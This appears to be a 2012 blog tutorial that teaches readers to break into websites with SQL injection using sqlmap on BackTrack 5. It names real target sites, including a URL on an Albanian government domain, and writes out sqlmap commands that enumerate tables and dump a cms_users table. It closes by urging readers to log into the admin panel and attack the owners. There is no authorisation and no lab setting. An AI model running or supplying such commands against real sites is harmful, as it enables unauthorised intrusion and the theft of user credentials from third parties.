how to hack almost every site with sqlmap

on Monday, 19 November 2012

[SQL]

Hello, today i am gonna show you how to hack almost every site vuln on SQL...

 

Start

 

- - - - - - - - - -

 

First of all you must to find some vuln sites...

 

Our target is : http://www.zwcad.org/


 


 

to se if it is vuln try to add ' on url, like this :

 


 

- - - - - - - - - - - - - - - - - - - - - - - - - -

 

now when we have some vuln sites we can open a sqlmap...

 

Start>Backtrack>Exploitation Tools>Web Exploitation Tools>sqlmap

 

This is on a BackTrack 5...

 

- - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

Now we must type some commands..

 


 

It looks like this :

 

when we hit the ENTER the scan is started and when scan is over we will get database's, it looks like this :

 

Then we must put another commands to start searching a tables..

that command is :

 

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB --tables

 

 

When you hit the enter the tables seraching is started and when it's over we get this info :

 

 

Now we must type a third command for searching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table..

 

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users --dump

 

And you will get this :

 

You can to this too : Step by step..

To type a command for coloumns :

 

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump

 

With this command we will get a info about one column..

Like this :

 

Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/

 

Now when we get the all info, we only must to find a admin panel and to log in and fuck THEM !!!

 

 

 

Happy hacking

0 comments:

Post a Comment